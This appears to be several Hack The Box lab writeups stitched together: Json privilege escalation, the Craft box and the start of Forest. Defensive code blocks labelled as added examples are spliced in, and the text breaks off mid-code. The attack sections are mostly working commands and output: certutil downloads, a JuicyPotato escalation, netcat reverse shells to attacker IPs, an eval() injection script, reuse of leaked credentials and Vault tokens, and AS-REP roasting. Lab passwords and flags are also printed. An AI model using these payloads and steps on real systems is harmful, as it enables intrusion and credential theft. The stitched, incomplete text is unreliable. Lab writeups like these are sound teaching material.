----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\windows\temp\sedje> certutil -urlcache -split -f http://10.10.16.70/nc.exe C:\users\userpool\Downloads\nc.exe
**** Online ****
0000 ...
6th
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp\sedje> certutil -urlcache -split -f http://10.10.16.70/juicypotato.exe C:\users\userpool\Downloads\juicypotato.exe
**** Online ****
000000 ...
054e00
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp\sedje> cd C:\users\userpool\Downloads\
PS C:\users\userpool\Downloads> .\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\users\userpool\Downloads\nc.exe 10.10.16.70 53 -e cmd.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\users\userpool\Downloads>
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.158 - - [13/Jan/2020 05:58:01] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.158 - - [13/Jan/2020 05:58:01] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.158 - - [13/Jan/2020 05:58:16] "GET /juicypotato.exe HTTP/1.1" 200 -
10.10.10.158 - - [13/Jan/2020 05:58:17] "GET /juicypotato.exe HTTP/1.1" 200 -
root@kali:~/htb/json# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49972
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
whoami
nt authority\system

C:\Windows\system32>

Files used: https://github.com/puckiestyle/python/blob/master/htb-json.py

https://github.com/puckiestyle/pentest/blob/master/ysoserial.zip

https://github.com/puckiestyle/pentest/blob/master/juicypotato.exe

https://github.com/pwntester/ysoserial.net

root = 3cc85d1bed2ee84af4074101b991d441

Author: Puckiestyle


HTB-CRAFT-NL

Craft is retired. I really enjoyed solving it. The IP address is 10.10.10.110 and I added it to /etc/hosts as craft.htb. Let's get straight to it!

Scan

root@kali:~/htb/craft# nmap -sV -O craft.htb -oN scan.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 05:32 EST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 05:33 (0:00:12 remaining)
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.054s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
443/tcp open  ssl/http nginx 1.15.8
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds

Poort 443 is open, wat betekent dat er een (waarschijnlijk) HTTPS-site op draait. Ik heb https: //craft.htb geopend in een browser:

In de rechterbovenhoek vond ik knoppen die me naar 2 verschillende subdomeinen brachten: api.craft.htb en gogs.craft.htb. Ik voegde deze toe aan /etc/hosts

Enumerating de 2 Sub-Domeinen

api.craft.htb, was niet erg interessant, omdat er een API werd gehost die alleen toegankelijk was met geldige inloggegevens.

Before I tested the API, I wanted to make sure there was nothing easier to exploit on gogs.craft.htb.

It turned out I was right. There is a publicly accessible repository that contains the source code of the API:

In addition, there was an interesting “issue”:

Dinesh:
Fix is live and seems to be working :)

c414b16057

Gilfoyle:
I fixed the database schema so this is not an issue now.. Can we remove that sorry excuse for a "patch" before something awful happens?

I looked at the commit that contained the patch and immediately saw the vulnerability:

https://gogs.craft.htb/Craft/craft-api/commit/c414b160578943acfe2e158e89409623f41da4c6

The ‘patch’ uses eval() to check whether the ABV value (whatever that was) is less than 1. eval() should never be used on user input, because a malicious attacker can use it to achieve RCE. At this point I knew I could get a shell if I had a valid username/password combination.
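The eval() point above, as an added example that is not code from the craft-api repository: the eval()-based check the issue describes, beside a check that only ever accepts a number and never executes anything. The function names, the validate_brew field set and its length limits are assumptions; the API's real request handler is not reproduced here.

```python
from decimal import Decimal, InvalidOperation

# Added example, not code from the craft-api repository. It shows the eval()
# pattern the issue complains about next to a check that only accepts numbers.


def check_abv_with_eval(abv_input):
    """The pattern the 'patch' used: the client's string is evaluated as Python
    and the result is compared with 1. Any expression, not just a number, runs
    with the privileges of the API process. Kept here only for contrast."""
    return eval(abv_input) < 1


def validate_abv(abv_input):
    """Return the ABV as a Decimal if it is a finite number in [0, 1).

    Raises ValueError for anything else (expressions, words, NaN, infinities,
    booleans, out-of-range values). Nothing in the input is ever executed.
    """
    if isinstance(abv_input, bool) or not isinstance(abv_input, (str, int, float)):
        raise ValueError("abv must be a number or a numeric string")
    try:
        abv = Decimal(str(abv_input).strip())
    except InvalidOperation:
        raise ValueError("abv is not a decimal number") from None
    if not abv.is_finite():
        raise ValueError("abv must be a finite number")
    if not Decimal(0) <= abv < Decimal(1):
        raise ValueError("abv must be a decimal value less than 1.0")
    return abv


def is_valid_abv(abv_input):
    """True if validate_abv accepts the input, False otherwise."""
    try:
        validate_abv(abv_input)
    except ValueError:
        return False
    return True


def validate_brew(payload):
    """Validate a brew object with the fields the API takes (name, brewer,
    style, abv; the 1-100 character limit is an assumption). Returns a
    cleaned dict or raises ValueError, so the handler never sees raw input."""
    if not isinstance(payload, dict):
        raise ValueError("payload must be a JSON object")
    cleaned = {}
    for field in ("name", "brewer", "style"):
        value = payload.get(field)
        if not isinstance(value, str) or not 1 <= len(value.strip()) <= 100:
            raise ValueError(f"{field} must be a string of 1 to 100 characters")
        cleaned[field] = value.strip()
    cleaned["abv"] = str(validate_abv(payload.get("abv")))
    return cleaned


if __name__ == "__main__":
    for candidate in ("0.05", 0.5, "1.2", "NaN", "1-0.5", "0.5 if 1 else 2"):
        print(repr(candidate), "->", is_valid_abv(candidate))
```

Decimal rather than float is used so that "NaN", "Infinity" and exponent notation are handled explicitly instead of slipping through a float comparison, and the numeric string is parsed, never evaluated.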

Credentials and ‘Shell As Root’

After I started looking for credentials, it wasn’t long before I found them. As it turned out, Dinesh initially added a test script with his credentials:

https://gogs.craft.htb/Craft/craft-api/commit/10e3ba4f0a09c778d7cec673f28d410b73455a86
response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)

Now that I had valid credentials, I wrote a simple script that would spawn a reverse shell:

#!/usr/bin/env python

import requests
import json

response = requests.get('https://api.craft.htb/api/auth/login', auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
json_response = json.loads(response.text)
token = json_response['token']

headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json' }

print("Spawning a reverse shell on port 443...")
brew_dict = {}
brew_dict['abv'] = '__import__("os").system("nc 10.10.14.156 443 -e /bin/sh &") #'
brew_dict['name'] = 'bullshit'
brew_dict['brewer'] = 'bullshit'
brew_dict['style'] = 'bullshit'

json_data = json.dumps(brew_dict)
response = requests.post('https://api.craft.htb/api/brew/', headers=headers, data=json_data, verify=False)
print("Done!")
root@fury-battlestation:~/htb/blog/craft# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.156] from (UNKNOWN) [10.10.10.110] 45619
python -c 'import pty; pty.spawn("/bin/sh")'
/opt/app # whoami         
whoami
root
/opt/app # ls -lah /root
ls -lah /root
total 16
drwx------    1 root     root        4.0K Nov 10 11:16 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
-rw-------    1 root     root          21 Nov 10 11:16 .ash_history
drwx------    1 root     root        4.0K Feb  9  2019 .cache
/opt/app # ls -lah /home
ls -lah /home
total 8
drwxr-xr-x    2 root     root        4.0K Jan 30  2019 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
/opt/app #

The root was a lie! It took me some time, but I realized I was in a Docker container.

GOGS Credentials & User

Since I was in the app’s directory, I read the contents of dbtest.py to find the credentials for the database:

#!/usr/bin/env python
 
import pymysql
from craft_api import settings
 
# test connection to mysql database
 
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)
 
try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)
 
finally:
    connection.close()

The credentials are stored in craft_api/settings.py, so I displayed the contents of that file:

# Flask settings
FLASK_SERVER_NAME = 'api.craft.htb'
FLASK_DEBUG = False  # Do not use debug mode in production
 
# Flask-Restplus settings
RESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'
RESTPLUS_VALIDATE = True
RESTPLUS_MASK_SWAGGER = False
RESTPLUS_ERROR_404_HELP = False
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
 
# database
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'
MYSQL_DATABASE_HOST = 'db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
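Both findings above, the test script committed with a login and a settings.py full of literal passwords, are the kind of thing a pre-commit or CI secret scan catches before it reaches a repository. Added example, not part of the craft-api project or this writeup: a small scanner for literal secret assignments and requests-style auth tuples, run over constructed sample lines shaped like the two files above (every value in the sample is a placeholder; the patterns and placeholder list are assumptions).

```python
import re

# Added example, not code from the craft-api project. Flags literal secrets in
# source lines; the sample input is constructed and uses placeholder values.

SECRET_PATTERNS = [
    # NAME = 'value' where NAME looks like a secret (PASSWORD, SECRET, TOKEN, ...)
    ("assignment", re.compile(
        r"""(?P<name>[A-Za-z_]*(?:PASSWORD|PASSWD|SECRET|TOKEN|API_KEY)[A-Za-z_]*)"""
        r"""\s*=\s*['"](?P<value>[^'"]{6,})['"]""",
        re.IGNORECASE)),
    # requests-style auth=('user', 'password') tuples, as in the test script
    ("auth_tuple", re.compile(
        r"""auth\s*=\s*\(\s*['"](?P<name>[^'"]+)['"]\s*,\s*['"](?P<value>[^'"]+)['"]\s*\)""")),
]

# values that are obviously placeholders and not worth a finding (assumption)
PLACEHOLDERS = {"changeme", "password", "secret", "xxxxxx", "<password>", "example"}


def find_hardcoded_secrets(lines):
    """Return (line_no, kind, name, value) for every line carrying a literal secret.

    Comment lines are skipped; values in PLACEHOLDERS are ignored. Reading a
    secret from the environment (os.environ[...]) does not match, by design.
    """
    findings = []
    for line_no, line in enumerate(lines, start=1):
        if line.strip().startswith("#"):
            continue
        for kind, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if m and m.group("value").lower() not in PLACEHOLDERS:
                findings.append((line_no, kind, m.group("name"), m.group("value")))
    return findings


def redact(value, keep=2):
    """Keep only the first `keep` characters so findings can be logged safely."""
    return value[:keep] + "*" * (len(value) - keep)


# Constructed sample: the shape of settings.py and the test script, placeholder values only.
SAMPLE_LINES = [
    "# Flask settings (constructed sample; every value is a placeholder)",
    "FLASK_SERVER_NAME = 'api.example.test'",
    "FLASK_DEBUG = False",
    "CRAFT_API_SECRET = 'EXAMPLE-api-secret-1'",
    "MYSQL_DATABASE_USER = 'craft'",
    "MYSQL_DATABASE_PASSWORD = 'EXAMPLE-db-pass-2'",
    "MYSQL_DATABASE_HOST = 'db'",
    "SECRET_KEY = os.environ['SECRET_KEY']  # read from the environment: fine",
    "response = requests.get(url, auth=('alice', 'EXAMPLE-login-3'), verify=False)",
    "DB_PASSWORD = 'changeme'  # placeholder, not a real secret",
]


if __name__ == "__main__":
    for line_no, kind, name, value in find_hardcoded_secrets(SAMPLE_LINES):
        print(f"line {line_no}: {kind} {name} = {redact(value)}")
```

The scanner reports the line and the variable name but redacts the value, so its own output does not become another place where the secret is written down.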

Then I connected to the database to see if there were any credentials I could use:

/opt/app # python
Python 3.6.8 (default, Feb  6 2019, 01:56:13) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pymysql
>>> from craft_api import settings
>>> connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
...                              user=settings.MYSQL_DATABASE_USER,
...                              password=settings.MYSQL_DATABASE_PASSWORD,
...                              db=settings.MYSQL_DATABASE_DB,
...                              cursorclass=pymysql.cursors.DictCursor)
>>> def exec_sql(sql):
...         cursor = connection.cursor()
...         cursor.execute(sql)
...         #result = cursor.fetchone()
...         result = cursor.fetchall()
...         print(result)
... 
>>> exec_sql("SHOW DATABASES;")
[{'Database': 'craft'}, {'Database': 'information_schema'}]
>>> exec_sql("SHOW TABLES")
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
>>> exec_sql("SELECT * FROM user")
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
>>> 

The database contains the following data:

dinesh 4aUh0A8PbVJxgd
ebachman llJ77D8QFkLPQB
gilfoyle ZEU3N8WNM2rh4T

I tried them on SSH, but they didn’t work. However, they did seem to work on the GOGS platform. Gilfoyle had another private repository that looked interesting:

I clicked the .ssh folder and saw the following SSH keys:

I downloaded these 2 keys and set the correct SSH permissions on them with chmod 600.

The key is protected with a passphrase. Fortunately Gilfoyle reused his GOGS password, ZEU3N8WNM2rh4T, so I was able to connect to the machine:

root@kali:~/htb/craft/ssh# ssh gilfoyle@craft.htb -i id_rsa
The authenticity of host 'craft.htb (10.10.10.110)' can't be established.
ECDSA key fingerprint is SHA256:sFjoHo6ersU0f0BTzabUkFYHOr6hBzWsSK0MK5dwYAw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'craft.htb,10.10.10.110' (ECDSA) to the list of known hosts.


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Enter passphrase for key 'id_rsa': ZEU3N8WNM2rh4T
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gilfoyle@craft:~$ pwd
/home/gilfoyle
root@craft:/home/gilfoyle# cat user.txt
bbf4b0cadfa3d4e6d0914c9cd5a612d4
gilfoyle@craft:~$

Getting Root

After I got the user flag, I remembered an interesting folder in the private repository named vault, so I checked it out:

After some googling I found the application’s website.

Basically, the system uses tokens to grant access to services across machines. I also found a file named .vault-token in the user’s home directory, so I tried to see the token’s capabilities:

gilfoyle@craft:~$ cat ~/.vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
gilfoyle@craft:~$ vault token capabilities f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
root
gilfoyle@craft:~$

In short, the token gives root-level access to Vault, which grants access to services across machines. With the token from the user’s home directory, I logged in to Vault:

gilfoyle@craft:~$ vault login -address=https://vault.craft.htb:8200 token=f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$

Then I connected over SSH as root using the one-time password (OTP) option of “Vault”:

gilfoyle@craft:~$ vault ssh -mode otp root@localhost
WARNING: No -role specified. Use -role to tell Vault which ssh role to use for
authentication. In the future, you will need to tell Vault which role to use.
For now, Vault will attempt to guess based on the API response. This will be
removed in the Vault 1.1.
Vault SSH: Role: "root_otp"
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Password: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# pwd
/root
root@craft:~# cat root.txt 
831d64ef54d92c1af795daae28a11591
root@craft:~#

Author: Jacco Straathof

htb-forest-nl

As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-joined system in the HTB.local domain. It exposes Kerberos, LDAP and SMB services to the outside world and looks like a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ machine on Hackthebox, combined with the WinRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux reveals many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present, plus an obvious service account (svc-alfresco).
Furthermore, no password complexity seems to be enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present, which is commonly known as a major security risk if not properly configured! And a last line confirms the suspicion: Forest is actually part of the Domain Controllers group! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.

root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e

After trying it for a few users, I finally got an AS-REP (the encrypted TGT response) for the user svc-alfresco, which I could try to crack with hashcat.
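What GetNPUsers.py found above is a single bit in the account’s userAccountControl attribute (UF_DONT_REQUIRE_PREAUTH), which a defender can audit in the directory long before anyone asks the DC for an AS-REP. Added example, not code from this writeup: it decodes the userAccountControl bitmask and lists enabled accounts with pre-authentication disabled, plus two related hygiene flags, over constructed sample records. The flag values are the documented Active Directory ones; the sample accounts and the flags assigned to them are assumptions, not data pulled from Forest.

```python
# Added example, not code from the writeup. Decodes userAccountControl and
# reports the accounts a defender should look at. Sample records are constructed.

# Documented userAccountControl bits (subset)
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000010: "LOCKOUT",
    0x00000020: "PASSWD_NOTREQD",
    0x00000200: "NORMAL_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x00000002
PASSWD_NOTREQD = 0x00000020
DONT_EXPIRE_PASSWORD = 0x00010000
DONT_REQ_PREAUTH = 0x00400000


def decode_uac(value):
    """Names of all known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(records):
    """sAMAccountNames of enabled accounts that do not require Kerberos pre-auth.

    These are exactly the accounts for which a DC returns an AS-REP without a
    password, which is what GetNPUsers.py looks for."""
    return sorted(
        r["sAMAccountName"] for r in records
        if r["userAccountControl"] & DONT_REQ_PREAUTH
        and not r["userAccountControl"] & ACCOUNTDISABLE
    )


def hygiene_findings(records):
    """(account, finding) pairs for enabled accounts with risky UAC flags."""
    findings = []
    for r in records:
        uac = r["userAccountControl"]
        name = r["sAMAccountName"]
        if uac & ACCOUNTDISABLE:
            continue  # disabled accounts cannot authenticate; lower priority
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "DONT_REQ_PREAUTH: AS-REP obtainable without a password, crackable offline"))
        if uac & PASSWD_NOTREQD:
            findings.append((name, "PASSWD_NOTREQD: account may have an empty password"))
        if uac & DONT_EXPIRE_PASSWORD:
            findings.append((name, "DONT_EXPIRE_PASSWORD: password never rotates"))
    return findings


# Constructed sample records (assumption: shaped like an LDAP export of user objects).
SAMPLE_USERS = [
    {"sAMAccountName": "sebastien",    "userAccountControl": 0x200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x200 | 0x10000 | 0x400000},
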